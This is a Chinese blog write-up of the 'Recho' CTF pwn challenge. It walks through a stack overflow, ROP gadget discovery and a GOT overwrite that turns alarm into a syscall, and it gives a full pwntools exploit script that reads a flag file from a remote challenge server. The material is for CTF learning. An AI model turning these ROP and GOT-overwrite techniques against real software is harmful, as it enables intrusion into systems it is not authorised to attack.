攻防世界PWN之Recho题解

最新推荐文章于 2023-02-07 11:37:59 发布
最新推荐文章于 2023-02-07 11:37:59 发布
阅读量2.3k 收藏 9
点赞数 12
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/102992887
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Recho

首先,还是查看一下程序的保护机制。看起来不错。

然后用IDA分析

看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次ROP到主函数获取输入,因为关闭后就不能打开,除非重新运行,那么之前的工作不都白费了吗。因此,我们必须一次性完成所有操作。

一次性要完成所有操作,那么暴露地址的方式肯定不能完成,幸运的是,我们可以使用系统调用(syscall)。对于有些系统,system也可以用系统调用,而对于有些系统则不行,因此,我们这里不再geshell,我们直接读取flag,然后打印出来。

 

我们知道,open、write、read、alarm这些都是系统调用,看看IDA代码就知道

我们希望构造这样的代码来拿到flag

  1. int fd = open("flag",READONLY);  
  2. read(fd,buf,100);  
  3. printf(buf);  

由于本程序已经导入了alarm、read、write几个函数,我们现在缺的是open函数,由于open函数内部也是系统调用,只需要改变传入的eax,就可以调用open,因此,我们首先需要拿到syscall的地址或者是调用它的某处的地址。

alarm函数我们用不到,因此,我们想把它的GOT表地址改掉,但是,如何改呢,我们发现有这么一个gadget,这是经验,赶紧记下来,这个重点

 

先把两处undefine,然后再code,就变成了两条指令

 

 

这个可以把rdi里面存地址指向处加上al,那么,如果rdi里存储着alarm的GOT表地址,那么add [rdi],al就是把GOT表里指向的地址向后偏移al,由于alarm函数向后偏移0x5个字节处调用了syscall,因此,如果我们的al0x5,那么,add指令执行后,我们的alarm函数GOT表里的地址就指向了syscall的调用处,那么我们调用alarm也就是调用syscall,我们只需在之前传入eax(系统调用号),就可以调用我们需要的系统调用

查看libc的汇编代码,我们知道了open的系统调用号为2

因此我们就可以拼凑出一个open来

 

我们还需要其他的一些指令,用来传参数,这些指令用IDA的搜索功能搜索pop就能找到,当然还有经验,

  1. #用于传参  
  2. '''''pop rax 
  3.    retn'''  
  4. pop_rax = 0x4006FC  
  5. '''''pop rdx 
  6.    retn'''  
  7. pop_rdx = 0x4006FE  
  8. '''''pop rsi 
  9.    pop r15 
  10.    retn'''  
  11. pop_rsi = 0x4008A1  
  12. '''''pop rdi 
  13.    retn'''  
  14. pop_rdi = 0x4008A3  
  15. '''''add [rdi],al 
  16.    retn'''  
  17. rdi_add = 0x40070d  

比如这种隐藏的,需要经验,赶紧记住了。

Undefined后再向后偏移一个字节点Code,就出来了。其他类似。

我们还需要一个存取读取结果的地方,BSS段是可以读写的

  1. #存储字符串  
  2. stdin_buffer = 0x601070  

程序中也为我们准备好了”flag”字符串,指示我们使用

那么,我们就开始构造payload吧

 

我们需要先修改alarm的GOT表,改成调用syscall

  1. payload = 'a'*0x38  
  2. #######修改alarmGOT表内容为alarm函数里的syscall调用处地址##########  
  3. #rdi = alarm_got  
  4. payload += p64(pop_rdi) + p64(alarm_got)  
  5. #rax = 0x5  
  6. payload += p64(pop_rax) + p64(0x5)  
  7. #[rdi] = [rdi] + 0xE = alarm函数里的syscall的调用处  
  8. payload += p64(rdi_add)  
  9. ########  

然后,我们先构造fd = open(“flag”,READONLY);这句代码

  1. '''''fd = open('flag',READONLY)'''  
  2. # rsi = 0 (READONLY)  
  3. payload += p64(pop_rsi) + p64(0) + p64(0)  
  4. #rdi = 'flag'  
  5. payload += p64(pop_rdi) + p64(elf.search('flag').next())  
  6. #rax = 2,open的调用号为2,通过调试即可知道  
  7. payload += p64(pop_rax) + p64(2)  
  8. #syscall  
  9. payload += p64(alarm_plt)  

open以后,fd的值一般是3开始,依次增加。比如我open了两个文件,那么它们的fd分别为34。如果特殊,具体看调试结果

 

接下来,我们开始构造read(fd,stdin_buffer,100);这句代码

  1. ''''' read(fd,stdin_buffer,100) '''  
  2. #rdi指向buf区,用于存放读取的结果  
  3. payload += p64(pop_rsi) + p64(stdin_buffer) + p64(0)  
  4. #open()打开文件返回的文件描述符一般从3开始,依次顺序增加  
  5. payload += p64(pop_rdi) + p64(3)  
  6. # rax = 100,最多读取100个字符  
  7. payload += p64(pop_rdx) + p64(100)  
  8. #指向read函数  
  9. payload += p64(read_plt)  

现在,flag的内容已经存到了std_buffer里面了,我们用printf打印它就能获得答案

  1. #使用printf打印读取的内容  
  2. payload += p64(pop_rdi) + p64(stdin_buffer) + p64(printf_plt)  

 

最后,我们关闭流,使循环退出,main函数到retn处,执行我们的ROP。

  1. #关闭输入流,就可以退出那个循环,执行ROP  
  2. sh.shutdown('write')  

综上,我们的exp脚本如下

  1. #coding:utf8  
  2. from pwn import *  
  3. import time  
  4.   
  5. context.log_level = 'debug'  
  6. #sh = process('./pwnh18')  
  7. sh = remote('111.198.29.45',56942)  
  8.   
  9. elf = ELF('./pwnh18')  
  10.   
  11. #用于传参  
  12. '''''pop rax 
  13.    retn'''  
  14. pop_rax = 0x4006FC  
  15. '''''pop rdx 
  16.    retn'''  
  17. pop_rdx = 0x4006FE  
  18. '''''pop rsi 
  19.    pop r15 
  20.    retn'''  
  21. pop_rsi = 0x4008A1  
  22. '''''pop rdi 
  23.    retn'''  
  24. pop_rdi = 0x4008A3  
  25. '''''add [rdi],al 
  26.    retn'''  
  27. rdi_add = 0x40070d  
  28.   
  29. #bss段的stdin缓冲区,我们可以把数据存在这里  
  30. stdin_buffer = 0x601070  
  31.   
  32. alarm_got = elf.got['alarm']  
  33. alarm_plt = elf.plt['alarm']  
  34. read_plt = elf.plt['read']  
  35. printf_plt = elf.plt['printf']  
  36.   
  37. sh.recvuntil('Welcome to Recho server!\n')  
  38.   
  39. sh.sendline(str(0x200))  
  40.   
  41. payload = 'a'*0x38  
  42. #######修改alarmGOT表内容为alarm函数里的syscall调用处地址##########  
  43. #rdi = alarm_got  
  44. payload += p64(pop_rdi) + p64(alarm_got)  
  45. #rax = 0x5  
  46. payload += p64(pop_rax) + p64(0x5)  
  47. #[rdi] = [rdi] + 0xE = alarm函数里的syscall的调用处  
  48. payload += p64(rdi_add)  
  49. ########  
  50. '''''fd = open('flag',READONLY)'''  
  51. # rsi = 0 (READONLY)  
  52. payload += p64(pop_rsi) + p64(0) + p64(0)  
  53. #rdi = 'flag'  
  54. payload += p64(pop_rdi) + p64(elf.search('flag').next())  
  55. #rax = 2,open的调用号为2,通过调试即可知道  
  56. payload += p64(pop_rax) + p64(2)  
  57. #syscall  
  58. payload += p64(alarm_plt)  
  59. ''''' read(fd,stdin_buffer,100) '''  
  60. #rdi指向buf区,用于存放读取的结果  
  61. payload += p64(pop_rsi) + p64(stdin_buffer) + p64(0)  
  62. #open()打开文件返回的文件描述符一般从3开始,依次顺序增加  
  63. payload += p64(pop_rdi) + p64(3)  
  64. # rax = 100,最多读取100个字符  
  65. payload += p64(pop_rdx) + p64(100)  
  66. #指向read函数  
  67. payload += p64(read_plt)  
  68. #使用printf打印读取的内容  
  69. payload += p64(pop_rdi) + p64(stdin_buffer) + p64(printf_plt)  
  70. #这步也关键,尽量使字符串长,这样才能将我们的payload全部输进去,不然可能因为会有缓存的问题导致覆盖不完整  
  71. payload = payload.ljust(0x200,'\x00')  
  72.   
  73. sh.sendline(payload)  
  74. #关闭输入流,就可以退出那个循环,执行ROP  
  75. sh.shutdown('write')  
  76.   
  77. sh.interactive() 
ha1vk
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
PWN系列】攻防世界 RECHO 题解
Vicl1fe的博客
11-03 450
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.freesion.com/article/5370510581/ 参考网址写的很详细。转载一下。
攻防世界】Recho
weixin_43960998的博客
03-28 665
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
攻防世界--Recho
qq_73149934的博客
02-07 205
攻防世界--Recho
Rcheo--攻防世界pwn
Return的博客
03-06 234
1.先查一下保护机制
攻防世界 Pwn Recho
MrTreebook的博客
12-18 641
攻防世界 Pwn Recho1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 3.IDA分析 可以看到这个while是死循环 所以要学会使用pwntools的shutdown功能来退出循环 但是循环退出之后就不能再进入了 接下来要看一下漏洞在哪 这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来 在gdb动态调试时,分析alarm,发现有 有syscall系统调用 漏洞利用思路如下:
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
pwn-Recho
醉等佳人归
09-08 271
1.题目 1.保护机制 开启nx 2.关键代码 2.思路 重点1:看出来是个很简单的栈溢出,但是第一个问题是这个循环是个死循环,如果直接使用close()函数程序会直接退出,查询资料后发现pwn库中提供了shutdown()函数,他可以关闭IO流,即让循环正常退出 重点2:既然使用shutdown函数,我们必须一次性将payload发送过去,这就导致我们不能使用内存泄漏来泄漏system函数,查询了一下字符串发现有一个flag,所以我们考虑使用系统调用完成,alarm,open,read,write函数的
攻防世界(pwn)Recho(XCTF 3rd-RCTF-2017) writeup
xidoo1234的博客
02-27 1237
深感本题扩充了本人的知识面,遂作文记录下来
Recho(xctf)
weixin_43868725的博客
08-10 885
0x0 程序保护和流程 保护: 流程: main() 存在一个很明显的问题,就第二次可以输入的字符串大小是根据第一次输入的数字大小确定的,所以存在一个明显的栈溢出。 0x1 利用过程 1.通过栈溢出控制程序的流程只会发生在函数结束时,但是在这个程序中只要第一次的read函数一直有效程序就不会退出,所以在对栈完成布局之后就需要关闭输入。 2.一旦关闭输入,就不能继续输入了,所以必须一次就把gadget全部布置到栈上。 3.通过提示可以在.data中找到flag字符串。 4.于是猜想需要将名字为flag的
[BMZCTF-pwn] 18-RCTF-2017-Recho
weixin_52640415的博客
02-15 278
复现一把,不看不行。 代码很简单,溢出很明显。 int __cdecl main(int argc, const char **argv, const char **envp) { char nptr[16]; // [rsp+0h] [rbp-40h] BYREF char buf[40]; // [rsp+10h] [rbp-30h] BYREF int v6; // [rsp+38h] [rbp-8h] int v7; // [rsp+3Ch] [rbp-4h] Init(
攻防世界高手进阶区——Recho
weixin_62675330的博客
03-11 415
攻防世界高手进阶区——Recho 题目什么也没给。(在这个题困了好久,一直在学基础,但是发现了一个更好用的学习网站,基本 ROP - CTF Wiki (ctf-wiki.org))希望对你们有用,估计以后就转战ctfwiki了。先做完这个题吧。 做题经历 int __cdecl main(int argc, const char **argv, const char **envp) { char nptr[16]; // [rsp+0h] [rbp-40h] BYREF char buf[40]
BUU-pwn(三)
qq_53263789的博客
06-19 248
pwn(三)
pwntools发送eof信号
SkYe's Blog
05-28 1585
做题目遇到的两种 eof 信号需求情况: 发送 eof 之后,后续不需要继续输入(vnctf-White-Give-Flag) 发送 eof 之后,后续还需要继续输入(mtctf-blind) eof 发送后继续输入 不用 mtctf-blind 做例子,因为利用 eof 绕过第一层之后,由于题目其他方面而无法 getshell ,用一个 demo 例子(来源)代替: #include <stdio.h> #include <stdlib.h> #include <stri
通过系统调用open来查看flag
Carrot_kexin的博客
10-17 257
这段代码中while有一个无法退出的循环,不能通过ROP获取flag,只能在代码中执行open函数。 我们希望构造这样的代码来拿到flag: int fd = open("flag", READONLY); read(fd, buf, 100); print(buf); 在程序中寻找可以利用的修改rax、rdi、rsi、rdx的语句(64位程序通过寄存器传参,rax用于系统调用): 具体能利用的地方在: 0x4008a1 : pop rsi ; pop r15 ; ret 0x4008a3 : .
32C3之PWN题目Readme的解法
HappyOrange2014的专栏
01-04 5840
本题是2015年32C3CTF比赛中一道300分的pwn题目,也是我第一次在赛后看着writeup做出的pwn题目,希望下次能够在赛中做出pwn题目。话说,忙碌的工作和生活之余,学习一点安全分析的知识,也是很快乐的一件事情!
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值